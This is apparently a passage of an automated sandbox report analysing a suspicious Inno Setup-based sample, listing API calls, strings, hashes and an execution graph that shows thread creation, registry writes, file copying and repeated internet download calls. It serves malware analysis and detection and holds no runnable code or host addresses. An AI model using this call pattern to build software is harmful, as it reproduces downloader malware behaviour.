                                                                • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,02164CBC,000026A8,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                              • String ID: )
                                                              • API String ID: 2227675388-1084416617
                                                              • Opcode ID: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
                                                              • Instruction ID: 77bd95ba853a3ee3b707a504883d316aad751082ca23ba06a0d8aa2ba3da16af
                                                              • Opcode Fuzzy Hash: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
                                                              • Instruction Fuzzy Hash: E11104317042046FEB15AB796F5962B6AD4D795758B24087FF404F33D2DABD8C02929C
                                                              APIs
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00496539
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Window
                                                              • String ID: /INITPROCWND=$%x $@
                                                              • API String ID: 2353593579-4169826103
                                                              • Opcode ID: 552611a81f91654fc44d41bb0f0c519a98a2c07263e337a61ce07e3eab6c417a
                                                              • Instruction ID: 8ac61a852f64af84e8a4d996ffe215da0ea6a1f7c0dd4c2642a2787a2d41e8fe
                                                              • Opcode Fuzzy Hash: 552611a81f91654fc44d41bb0f0c519a98a2c07263e337a61ce07e3eab6c417a
                                                              • Instruction Fuzzy Hash: C711A531A043089FDB01DF64E855BAE7BE8EB48324F52847BE404E7281DB3CE905CA58
                                                              APIs
                                                                • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                              • SysFreeString.OLEAUT32(?), ref: 004474D6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: String$AllocByteCharFreeMultiWide
                                                              • String ID: NIL Interface Exception$Unknown Method
                                                              • API String ID: 3952431833-1023667238
                                                              • Opcode ID: 258d3c6477c64922ebec54d5f4264d59c03dbf12c3c57b46792931bb3fd1eaaf
                                                              • Instruction ID: aafd2560cbf8ba646f5ae6954b41d26adab4393ec7197c17a1bba45f9511721b
                                                              • Opcode Fuzzy Hash: 258d3c6477c64922ebec54d5f4264d59c03dbf12c3c57b46792931bb3fd1eaaf
                                                              • Instruction Fuzzy Hash: 0811D6306042049FEB10DFA59D42A6EBBACEB49704F91403AF504E7681C7789D01CB69
                                                              APIs
                                                              • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD88
                                                              • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDC8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Value$EnumQuery
                                                              • String ID: Inno Setup: No Icons
                                                              • API String ID: 1576479698-2016326496
                                                              • Opcode ID: e0e38617d7780f69d75f26860b1501b2527d54a68fe4bf3310a8a6dfd5a7631c
                                                              • Instruction ID: 05ef73584c9e0c756a5fead926ccd29af3c260b6948a855c27afe474e1c18ecb
                                                              • Opcode Fuzzy Hash: e0e38617d7780f69d75f26860b1501b2527d54a68fe4bf3310a8a6dfd5a7631c
                                                              • Instruction Fuzzy Hash: B2012B36F5A77179F73046256D02BBB56888B82B60F68453BF940EA2C0D6589C04C36E
                                                              APIs
                                                                • Part of subcall function 004555D0: GetCurrentProcess.KERNEL32(00000028), ref: 004555DF
                                                                • Part of subcall function 004555D0: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555E5
                                                              • SetForegroundWindow.USER32(?), ref: 00497266
                                                              Strings
                                                              • Restarting Windows., xrefs: 00497243
                                                              • Not restarting Windows because Uninstall is being run from the debugger., xrefs: 00497291
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentForegroundOpenTokenWindow
                                                              • String ID: Not restarting Windows because Uninstall is being run from the debugger.$Restarting Windows.
                                                              • API String ID: 3179053593-4147564754
                                                              • Opcode ID: 699fd1f27132e499a72d678966239612eac8b61dfe9d57f4c88cf0c32b356d0f
                                                              • Instruction ID: f042dff5c045186d33be5417afa4f05d679b9763972d2bb00463d131ea403ed4
                                                              • Opcode Fuzzy Hash: 699fd1f27132e499a72d678966239612eac8b61dfe9d57f4c88cf0c32b356d0f
                                                              • Instruction Fuzzy Hash: FD01D8706282406BEB00EB65E981B9C3F99AB5430CF5040BBF900A72D3D73C9945871D
                                                              APIs
                                                                • Part of subcall function 0047CD84: FreeLibrary.KERNEL32(6F950000,004814B7), ref: 0047CD9A
                                                                • Part of subcall function 0047CA54: GetTickCount.KERNEL32 ref: 0047CA9E
                                                                • Part of subcall function 004570CC: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004570EB
                                                              • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,0049832B), ref: 00497A29
                                                              • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,0049832B), ref: 00497A2F
                                                              Strings
                                                              • Detected restart. Removing temporary directory., xrefs: 004979E3
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                              • String ID: Detected restart. Removing temporary directory.
                                                              • API String ID: 1717587489-3199836293
                                                              • Opcode ID: e611eeaa9fed28cadb8c69ef2edffd8a52967f1f4ce985551ff58b7f7fd4f302
                                                              • Instruction ID: 93f06bea8fcfa1b224d7ac257058da4e76460d04d1e35911cc499d3d1c0dfa98
                                                              • Opcode Fuzzy Hash: e611eeaa9fed28cadb8c69ef2edffd8a52967f1f4ce985551ff58b7f7fd4f302
                                                              • Instruction Fuzzy Hash: 51E0553120C3002EDA02B7B2BC52A2F7F8CD701728311083BF40882452C43D1810C77D
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(00000000,00498586), ref: 0040334B
                                                              • GetCommandLineA.KERNEL32(00000000,00498586), ref: 00403356
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CommandHandleLineModule
                                                              • String ID: H6V
                                                              • API String ID: 2123368496-2329698526
                                                              • Opcode ID: 48b45b62bccbc2a8e5daf731e4078a894a727d510552ebcfe8024faf6b9ab272
                                                              • Instruction ID: ff8fa06d391bd0b31f892a344b3e95d40f530220570fde7b1ba7fad45aeb04f1
                                                              • Opcode Fuzzy Hash: 48b45b62bccbc2a8e5daf731e4078a894a727d510552ebcfe8024faf6b9ab272
                                                              • Instruction Fuzzy Hash: 45C002609013058AD754AF7579467162A94D751349F80447FF114BA3E1D77C82055BDD
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastSleep
                                                              • String ID:
                                                              • API String ID: 1458359878-0
                                                              • Opcode ID: 11e49af8eca5aab8e77903997d46822470632a6293514e89f51700c73713890d
                                                              • Instruction ID: a2606c7dd4c17da0a3c90c20a229de96912268129783a4208f21052e6a4fbdd3
                                                              • Opcode Fuzzy Hash: 11e49af8eca5aab8e77903997d46822470632a6293514e89f51700c73713890d
                                                              • Instruction Fuzzy Hash: 62F02436B01D64578F20A59E998193F63DDEA94376750013BFC0CDB303D438CC098AA9

                                                              Execution Graph

                                                              Execution Coverage:9.2%
                                                              Dynamic/Decrypted Code Coverage:76.1%
                                                              Signature Coverage:9.7%
                                                              Total number of Nodes:1361
                                                              Total number of Limit Nodes:42
                                                              execution_graph 18341 402840 18342 402809 CopyFileA 18341->18342 18343 402849 18341->18343 18342->18341 18345 40d1c0 18346 40db31 lstrcmpiW 18345->18346 18347 4021c0 LoadLibraryExA 18348 4021d3 18347->18348 18349 40d04b 18348->18349 18349->18348 18350 40d0e3 GetProcAddress 18349->18350 18350->18349 18351 40d181 18352 40da69 RegOpenKeyExA 18351->18352 18353 40d851 18351->18353 18352->18353 18353->18353 18354 2cb13c9 18355 2cfaae2 WriteFile 18354->18355 18357 40d385 VirtualAlloc 18358 40dafa 18357->18358 18907 40d067 18908 40d0c7 RegSetValueExA 18907->18908 18359 402589 18360 4025cb 18359->18360 18361 40d707 RegCreateKeyExA 18360->18361 18362 40d883 18360->18362 18361->18360 18910 2cd31e4 18911 2cd73d4 CreateThread 18910->18911 18913 2c7648b RtlInitializeCriticalSection GetModuleHandleA GetProcAddress 18911->18913 18914 2c764e2 GetModuleHandleA GetProcAddress 18913->18914 18992 2c742c7 18914->18992 18916 2c764f3 GetTickCount 18917 2c7605a 59 API calls 18916->18917 18918 2c76508 GetVersionExA 18917->18918 18919 2c76549 __wctomb_s_l 18918->18919 18920 2c82eec _malloc 59 API calls 18919->18920 18921 2c76556 18920->18921 18922 2c82eec _malloc 59 API calls 18921->18922 18923 2c76566 18922->18923 18924 2c82eec _malloc 59 API calls 18923->18924 18925 2c76571 18924->18925 18926 2c82eec _malloc 59 API calls 18925->18926 18927 2c7657c 18926->18927 18928 2c82eec _malloc 59 API calls 18927->18928 18929 2c76587 18928->18929 18930 2c82eec _malloc 59 API calls 18929->18930 18931 2c76592 18930->18931 18932 2c82eec _malloc 59 API calls 18931->18932 18933 2c7659d 18932->18933 18934 2c82eec _malloc 59 API calls 18933->18934 18935 2c765ac 6 API calls 18934->18935 18936 2c765ff __wctomb_s_l 18935->18936 18937 2c76618 RtlEnterCriticalSection RtlLeaveCriticalSection 18936->18937 18938 2c82eec _malloc 59 API calls 18937->18938 18939 2c76657 18938->18939 18940 2c82eec _malloc 59 API calls 18939->18940 18941 2c76665 18940->18941 18942 2c82eec _malloc 59 API calls 18941->18942 18943 2c7666c 18942->18943 18944 2c82eec _malloc 59 API calls 18943->18944 18945 2c76692 QueryPerformanceCounter Sleep 18944->18945 18946 2c82eec _malloc 59 API calls 18945->18946 18947 2c766bf 18946->18947 18948 2c82eec _malloc 59 API calls 18947->18948 18968 2c766cc __wctomb_s_l 18948->18968 18949 2c76708 Sleep 18950 2c7670e RtlEnterCriticalSection RtlLeaveCriticalSection 18949->18950 18950->18968 18951 2c772ab InternetOpenA 18952 2c772c9 InternetSetOptionA InternetSetOptionA InternetSetOptionA 18951->18952 18951->18968 18957 2c77342 __wctomb_s_l 18952->18957 18953 2c77322 InternetOpenUrlA 18954 2c77382 InternetCloseHandle 18953->18954 18953->18957 18954->18968 18955 2c77346 InternetReadFile 18956 2c77377 InternetCloseHandle 18955->18956 18955->18957 18956->18954 18957->18953 18957->18955 18958 2c773e9 RtlEnterCriticalSection RtlLeaveCriticalSection 18959 2c8227c 66 API calls 18958->18959 18959->18968 18960 2c82eec _malloc 59 API calls 18961 2c7749d RtlEnterCriticalSection RtlLeaveCriticalSection 18960->18961 18961->18968 18962 2c7776a RtlEnterCriticalSection RtlLeaveCriticalSection 18962->18968 18963 2c761f5 59 API calls 18963->18968 18964 2c8227c 66 API calls 18964->18968 18965 2c82358 _sprintf 79 API calls 18965->18968 18966 2c71ba7 210 API calls 18966->18968 18967 2c778e2 RtlEnterCriticalSection 18967->18968 18969 2c7790f RtlLeaveCriticalSection 18967->18969 18968->18949 18968->18950 18968->18951 18968->18958 18968->18960 18968->18962 18968->18963 18968->18964 18968->18965 18968->18966 18968->18967 18968->18969 18970 2c7534d 93 API calls 18968->18970 18971 2c82eec 59 API calls _malloc 18968->18971 18972 2c82eb4 59 API calls _free 18968->18972 18974 2c73d7e 64 API calls 18968->18974 18975 2c7826e 89 API calls 18968->18975 18976 2c78f36 88 API calls 18968->18976 18977 2c7831d 71 API calls 18968->18977 18978 2c83a8f _Allocate 60 API calls 18968->18978 18979 2c82790 _swscanf 59 API calls 18968->18979 18980 2c733b2 86 API calls 18968->18980 18981 2c7a658 73 API calls 18968->18981 18982 2c7966a 212 API calls 18968->18982 18983 2c83529 60 API calls _strtok 18968->18983 18984 2c7a782 60 API calls 18968->18984 18985 2c75119 103 API calls 18968->18985 18986 2c7d04a 73 API calls 18968->18986 18987 2c7ab42 210 API calls 18968->18987 18988 2c776e7 shared_ptr 18968->18988 18989 2c776ec Sleep 18968->18989 18973 2c73c67 72 API calls 18969->18973 18970->18968 18971->18968 18972->18968 18973->18968 18974->18968 18975->18968 18976->18968 18977->18968 18978->18968 18979->18968 18980->18968 18981->18968 18982->18968 18983->18968 18984->18968 18985->18968 18986->18968 18987->18968 18988->18968 18988->18989 18991 2c74100 GetProcessHeap HeapFree 18988->18991 18990 2c81830 GetProcessHeap HeapFree 18989->18990 18990->18988 18991->18988 18993 2d08079 18994 2d0cd75 CloseHandle 18993->18994 18363 2c7104d 18368 2c832e7 18363->18368 18374 2c831eb 18368->18374 18370 2c71057 18371 2c71aa9 InterlockedIncrement 18370->18371 18372 2c71ac5 WSAStartup InterlockedExchange 18371->18372 18373 2c7105c 18371->18373 18372->18373 18375 2c831f7 ___BuildCatchObject 18374->18375 18382 2c884d2 18375->18382 18381 2c8321e ___BuildCatchObject 18381->18370 18399 2c8882d 18382->18399 18384 2c83200 18385 2c8322f RtlDecodePointer RtlDecodePointer 18384->18385 18386 2c8325c 18385->18386 18387 2c8320c 18385->18387 18386->18387 18698 2c8909d 18386->18698 18396 2c83229 18387->18396 18389 2c832bf RtlEncodePointer RtlEncodePointer 18389->18387 18390 2c83293 18390->18387 18393 2c88a3b __realloc_crt 62 API calls 18390->18393 18394 2c832ad RtlEncodePointer 18390->18394 18391 2c8326e 18391->18389 18391->18390 18705 2c88a3b 18391->18705 18395 2c832a7 18393->18395 18394->18389 18395->18387 18395->18394 18732 2c884db 18396->18732 18400 2c8883e 18399->18400 18401 2c88851 RtlEnterCriticalSection 18399->18401 18406 2c888b5 18400->18406 18401->18384 18403 2c88844 18403->18401 18428 2c8837f 18403->18428 18407 2c888c1 ___BuildCatchObject 18406->18407 18420 2c888e0 18407->18420 18435 2c88613 18407->18435 18413 2c8890d 18418 2c8882d __lock 59 API calls 18413->18418 18414 2c888fe 18487 2c85d9b 18414->18487 18415 2c88903 ___BuildCatchObject 18415->18403 18416 2c888d6 18479 2c8825c 18416->18479 18421 2c88914 18418->18421 18420->18415 18482 2c889f4 18420->18482 18422 2c88939 18421->18422 18423 2c88921 18421->18423 18493 2c82eb4 18422->18493 18490 2c8914c 18423->18490 18426 2c8892d 18499 2c88955 18426->18499 18429 2c88613 __FF_MSGBANNER 59 API calls 18428->18429 18430 2c88387 18429->18430 18431 2c88670 __NMSG_WRITE 59 API calls 18430->18431 18432 2c8838f 18431->18432 18668 2c8842e 18432->18668 18502 2c900be 18435->18502 18437 2c8861a 18438 2c88627 18437->18438 18439 2c900be __FF_MSGBANNER 59 API calls 18437->18439 18440 2c88670 __NMSG_WRITE 59 API calls 18438->18440 18443 2c88649 18438->18443 18439->18438 18441 2c8863f 18440->18441 18442 2c88670 __NMSG_WRITE 59 API calls 18441->18442 18442->18443 18444 2c88670 18443->18444 18445 2c8868e __NMSG_WRITE 18444->18445 18446 2c887b5 18445->18446 18447 2c900be __FF_MSGBANNER 55 API calls 18445->18447 18576 2c8448b 18446->18576 18450 2c886a1 18447->18450 18449 2c8881e 18449->18416 18451 2c887ba GetStdHandle 18450->18451 18452 2c900be __FF_MSGBANNER 55 API calls 18450->18452 18451->18446 18455 2c887c8 _strlen 18451->18455 18453 2c886b2 18452->18453 18453->18451 18454 2c886c4 18453->18454 18454->18446 18524 2c8f47d 18454->18524 18455->18446 18457 2c88801 WriteFile 18455->18457 18457->18446 18459 2c886f1 GetModuleFileNameW 18461 2c88711 18459->18461 18466 2c88721 __NMSG_WRITE 18459->18466 18460 2c88822 18462 2c84e45 __invoke_watson 8 API calls 18460->18462 18463 2c8f47d __NMSG_WRITE 55 API calls 18461->18463 18464 2c8882c 18462->18464 18463->18466 18465 2c88851 RtlEnterCriticalSection 18464->18465 18468 2c888b5 __mtinitlocknum 55 API calls 18464->18468 18465->18416 18466->18460 18467 2c88767 18466->18467 18533 2c8f4f2 18466->18533 18467->18460 18542 2c8f411 18467->18542 18470 2c88844 18468->18470 18470->18465 18474 2c8837f __amsg_exit 55 API calls 18470->18474 18473 2c8f411 __NMSG_WRITE 55 API calls 18475 2c8879e 18473->18475 18476 2c88850 18474->18476 18475->18460 18477 2c887a5 18475->18477 18476->18465 18551 2c900fe RtlEncodePointer 18477->18551 18591 2c88228 GetModuleHandleExW 18479->18591 18486 2c88a02 18482->18486 18484 2c888f7 18484->18413 18484->18414 18486->18484 18594 2c82eec 18486->18594 18611 2c89445 Sleep 18486->18611 18614 2c85bb2 GetLastError 18487->18614 18489 2c85da0 18489->18415 18491 2c89169 InitializeCriticalSectionAndSpinCount 18490->18491 18492 2c8915c 18490->18492 18491->18426 18492->18426 18494 2c82ee6 __dosmaperr 18493->18494 18495 2c82ebd HeapFree 18493->18495 18494->18426 18495->18494 18496 2c82ed2 18495->18496 18497 2c85d9b __wctomb_s_l 57 API calls 18496->18497 18498 2c82ed8 GetLastError 18497->18498 18498->18494 18667 2c88997 RtlLeaveCriticalSection 18499->18667 18501 2c8895c 18501->18415 18504 2c900c8 18502->18504 18503 2c900d2 18503->18437 18504->18503 18505 2c85d9b __wctomb_s_l 59 API calls 18504->18505 18506 2c900ee 18505->18506 18509 2c84e35 18506->18509 18512 2c84e0a RtlDecodePointer 18509->18512 18513 2c84e1d 18512->18513 18518 2c84e45 IsProcessorFeaturePresent 18513->18518 18516 2c84e0a __wctomb_s_l 8 API calls 18517 2c84e41 18516->18517 18517->18437 18519 2c84e50 18518->18519 18520 2c84cd8 __call_reportfault 7 API calls 18519->18520 18521 2c84e65 18520->18521 18522 2c89453 ___raise_securityfailure GetCurrentProcess TerminateProcess 18521->18522 18523 2c84e34 18522->18523 18523->18516 18525 2c8f488 18524->18525 18526 2c8f496 18524->18526 18525->18526 18531 2c8f4af 18525->18531 18527 2c85d9b __wctomb_s_l 59 API calls 18526->18527 18528 2c8f4a0 18527->18528 18529 2c84e35 __wctomb_s_l 9 API calls 18528->18529 18530 2c886e4 18529->18530 18530->18459 18530->18460 18531->18530 18532 2c85d9b __wctomb_s_l 59 API calls 18531->18532 18532->18528 18537 2c8f500 18533->18537 18534 2c8f504 18535 2c8f509 18534->18535 18536 2c85d9b __wctomb_s_l 59 API calls 18534->18536 18535->18467 18538 2c8f534 18536->18538 18537->18534 18537->18535 18540 2c8f543 18537->18540 18539 2c84e35 __wctomb_s_l 9 API calls 18538->18539 18539->18535 18540->18535 18541 2c85d9b __wctomb_s_l 59 API calls 18540->18541 18541->18538 18543 2c8f42b 18542->18543 18546 2c8f41d 18542->18546 18544 2c85d9b __wctomb_s_l 59 API calls 18543->18544 18545 2c8f435 18544->18545 18547 2c84e35 __wctomb_s_l 9 API calls 18545->18547 18546->18543 18549 2c8f457 18546->18549 18548 2c88787 18547->18548 18548->18460 18548->18473 18549->18548 18550 2c85d9b __wctomb_s_l 59 API calls 18549->18550 18550->18545 18552 2c90132 ___crtIsPackagedApp 18551->18552 18553 2c901f1 IsDebuggerPresent 18552->18553 18554 2c90141 LoadLibraryExW 18552->18554 18557 2c901fb 18553->18557 18558 2c90216 18553->18558 18555 2c90158 GetLastError 18554->18555 18556 2c9017e GetProcAddress 18554->18556 18559 2c90167 LoadLibraryExW 18555->18559 18566 2c9020e 18555->18566 18560 2c90192 7 API calls 18556->18560 18556->18566 18561 2c90209 18557->18561 18562 2c90202 OutputDebugStringW 18557->18562 18558->18561 18563 2c9021b RtlDecodePointer 18558->18563 18559->18556 18559->18566 18564 2c901da GetProcAddress RtlEncodePointer 18560->18564 18565 2c901ee 18560->18565 18561->18566 18567 2c9025a 18561->18567 18568 2c90242 RtlDecodePointer RtlDecodePointer 18561->18568 18562->18561 18563->18566 18564->18565 18565->18553 18569 2c8448b __87except 6 API calls 18566->18569 18570 2c90292 RtlDecodePointer 18567->18570 18575 2c9027e RtlDecodePointer 18567->18575 18568->18567 18572 2c902e0 18569->18572 18573 2c90299 18570->18573 18570->18575 18572->18446 18574 2c902aa RtlDecodePointer 18573->18574 18573->18575 18574->18575 18575->18566 18577 2c84493 18576->18577 18578 2c84495 IsProcessorFeaturePresent 18576->18578 18577->18449 18580 2c894cf 18578->18580 18583 2c8947e IsDebuggerPresent 18580->18583 18584 2c89493 ___raise_securityfailure 18583->18584 18589 2c89468 SetUnhandledExceptionFilter UnhandledExceptionFilter 18584->18589 18586 2c8949b ___raise_securityfailure 18590 2c89453 GetCurrentProcess TerminateProcess 18586->18590 18588 2c894b8 18588->18449 18589->18586 18590->18588 18592 2c88253 ExitProcess 18591->18592 18593 2c88241 GetProcAddress 18591->18593 18593->18592 18595 2c82f67 18594->18595 18607 2c82ef8 18594->18607 18596 2c88143 __calloc_impl RtlDecodePointer 18595->18596 18597 2c82f6d 18596->18597 18598 2c85d9b __wctomb_s_l 58 API calls 18597->18598 18610 2c82f5f 18598->18610 18599 2c88613 __FF_MSGBANNER 58 API calls 18606 2c82f03 18599->18606 18600 2c82f2b RtlAllocateHeap 18600->18607 18600->18610 18601 2c88670 __NMSG_WRITE 58 API calls 18601->18606 18602 2c82f53 18605 2c85d9b __wctomb_s_l 58 API calls 18602->18605 18603 2c8825c _malloc 3 API calls 18603->18606 18608 2c82f51 18605->18608 18606->18599 18606->18601 18606->18603 18606->18607 18607->18600 18607->18602 18607->18606 18607->18608 18612 2c88143 RtlDecodePointer 18607->18612 18609 2c85d9b __wctomb_s_l 58 API calls 18608->18609 18609->18610 18610->18486 18611->18486 18613 2c88156 18612->18613 18613->18607 18628 2c8910b 18614->18628 18616 2c85bc7 18617 2c85c15 SetLastError 18616->18617 18631 2c889ac 18616->18631 18617->18489 18621 2c85bee 18622 2c85c0c 18621->18622 18623 2c85bf4 18621->18623 18624 2c82eb4 _free 56 API calls 18622->18624 18640 2c85c21 18623->18640 18627 2c85c12 18624->18627 18626 2c85bfc GetCurrentThreadId 18626->18617 18627->18617 18629 2c89122 TlsGetValue 18628->18629 18630 2c8911e 18628->18630 18629->18616 18630->18616 18633 2c889b3 18631->18633 18634 2c85bda 18633->18634 18635 2c889d1 18633->18635 18650 2c903f8 18633->18650 18634->18617 18637 2c8912a 18634->18637 18635->18633 18635->18634 18658 2c89445 Sleep 18635->18658 18638 2c89140 18637->18638 18639 2c89144 TlsSetValue 18637->18639 18638->18621 18639->18621 18641 2c85c2d ___BuildCatchObject 18640->18641 18642 2c8882d __lock 59 API calls 18641->18642 18643 2c85c6a 18642->18643 18659 2c85cc2 18643->18659 18646 2c8882d __lock 59 API calls 18647 2c85c8b ___addlocaleref 18646->18647 18662 2c85ccb 18647->18662 18649 2c85cb6 ___BuildCatchObject 18649->18626 18651 2c9041e 18650->18651 18652 2c90403 18650->18652 18655 2c9042e RtlAllocateHeap 18651->18655 18656 2c90414 18651->18656 18657 2c88143 __calloc_impl RtlDecodePointer 18651->18657 18652->18651 18653 2c9040f 18652->18653 18654 2c85d9b __wctomb_s_l 58 API calls 18653->18654 18654->18656 18655->18651 18655->18656 18656->18633 18657->18651 18658->18635 18665 2c88997 RtlLeaveCriticalSection 18659->18665 18661 2c85c84 18661->18646 18666 2c88997 RtlLeaveCriticalSection 18662->18666 18664 2c85cd2 18664->18649 18665->18661 18666->18664 18667->18501 18671 2c884e4 18668->18671 18670 2c8839a 18672 2c884f0 